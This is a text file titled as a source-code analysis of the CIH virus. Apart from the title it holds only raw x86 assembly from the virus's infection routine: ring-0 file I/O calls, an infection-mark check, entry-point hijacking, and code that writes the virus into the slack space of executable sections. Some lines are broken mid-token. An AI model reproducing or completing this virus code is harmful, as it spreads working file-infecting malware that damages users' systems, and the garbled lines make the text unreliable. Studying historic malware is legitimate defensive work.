cih14.txt

cih14病毒的源代码分析

                                                                                 
                                     
                        lea     esi, (StartOfSectionTable-@8)[esi]               
                                                                                 
                        push    eax     ; Size                                   
                        push    edx     ; Pointer of File                        
                        push    esi     ; Address of Buffer                      
                                                                                 
                                                 
                                                                                 
                        inc     ecx                                              
                        push    ecx     ; Save NumberOfSections+1                
                                                                                 
                        shl     ecx, 03h                                         
                        push    ecx     ; Save TotalSizeOfVirusCodeSectionTable  
                                                                                 
                        add     ecx, eax                                         
                        add     ecx, edx                                         
                                                                                 
                        sub     ecx, (SizeOfHeaders-@9)[esi]                     
                        not     ecx                                              
                        inc     ecx                                              
                                                                                   
                        push    ecx                                              
                                                                                 
                        xchg    ecx, eax            
                                                                                                   
                        mov     eax, (AddressOfEntryPoint-@9)[esi]               
                        add     eax, (ImageBase-@9)[esi]                         
                        mov     (OriginalAddressOfEntryPoint-@9)[esi], eax       
                                                                                 
                        cmp     word ptr [esp], small CodeSizeOfMergeVirusCodeS  
tion                                                                             
                        jl      OnlySetInfectedMark                              
                                                                                 
                                                  
                                                                                 
                        mov     eax, ebp                                         
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO            
                                                                                 
                                                  
                                                                                 
                        xchg    eax, ebp                                         
                                                                                 
                        push    00000004h                                        
                        pop     ecx                                              
                                                                                 
                        push    edx                                              
                        mov     edx, (SizeOfScetionTable+PointerToRawData-@9)[e  
]                                                                                
                        add     edx, 12h                                         
                                                                                 
                        call    edi                 
                                                                                 
                                      
                        cmp     dword ptr [esi], 'piZn'                          
                        je      NotSetInfectedMark                               
                                                                                 
                        pop     edx                                              
                                                                                 
                                                                  
                        pop     ebx                                              
                        pop     edi      
                        pop     ecx                   
                                                                                 
                        push    edi                                       
                                                                                 
                        add     edx, ebp                                         
                        push    edx                            
                                                                                 
                        add     ebp, esi                                         
                        push    ebp                          
                                                   
                                                                                 
                        lea     eax, [ebp+edi-04h]                               
                        mov     [eax], ebx                                       
                                                 
                                                                                 
                        push    ebx     ; Size                                   
                                                                                 
                        add     edx, edi                                         
                        push    edx     ; Pointer of File                        
                                                                                 
                        lea     edi, (MyVirusStart-@9)[esi]                      
                        push    edi     ; Address of Buffer                      
                                                
                                                                                 
                        mov     (NewAddressOfEntryPoint-@9)[esi], edx            
                                                  
                                                                                 
                        lea     edx, [esi-SizeOfScetionTable]                    
                        mov     ebp, offset VirusSize                            
                                                                                 
                        jmp     StartToWriteCodeToSections                       
                                                  
                                                                                 
LoopOfWriteCodeToSections:                                                       
                                                                                 
                        add     edx, SizeOfScetionTable                          
                                                                                 
                        mov     ebx, (SizeOfRawData-@9)[edx]                     
                        sub     ebx, (VirtualSize-@9)[edx]                       
                        jbe     EndOfWriteCodeToSections                         
                                                                                 
                        push    ebx                                       
                                                                                 
                        sub     eax, 08h                                         
                        mov     [eax], ebx                                       
                                                                                 
                        mov     ebx, (PointerToRawData-@9)[edx]                  
                        add     ebx, (VirtualSize-@9)[edx]                       
                        push    ebx                            
                                                                                 
                        push    edi                         
                                                                                 
                        mov     ebx, (VirtualSize-@9)[edx]                       
                        add     ebx, (VirtualAddress-@9)[edx]                    
                        add     ebx, (ImageBase-@9)[esi]                         
                        mov     [eax+4], ebx                                     
                                                                                 
                        mov     ebx, [eax]                                       
                        add     (VirtualSize-@9)[edx], ebx                       
                                                                                 
                              
                        or      (Characteristics-@9)[edx], 40000040h             
                                                                                 
StartToWriteCodeToSections:                                                      
                                                                                 
                        sub     ebp, ebx                                         
                        jbe     SetVirusCodeSectionTableEndMark                  
                                                                                 
                        add     edi, ebx        ; Move Address of Buffer         
                                                                                 
EndOfWriteCodeToSections:                                                        
                                                                                 
                        loop    LoopOfWriteCodeToSections                        
                                                                                 
                                                  
                                                                                 
OnlySetInfectedMark:                                                             
                        mov     esp, dr1                                         
                                                                                 
                        jmp     WriteVirusCodeToFile                             
                                                                                 
                                                   
                                                                                 
NotSetInfectedMark:                                                              
                        add     esp, 3ch                                         
                                                                                 
                        jmp     CloseFile                                        
                                                                                 
                                                 
                                                                                 
SetVirusCodeSectionTableEndMark:                                                 
                                                                                 
                        ; Adjust Size of Virus Section Code to Correct Value     
                        add     [eax], ebp                                       
                        add     [esp+08h], ebp                                   
                                                                                 
                        ; Set End Mark                                           
                        xor     ebx, ebx                                         
                        mov     [eax-04h], ebx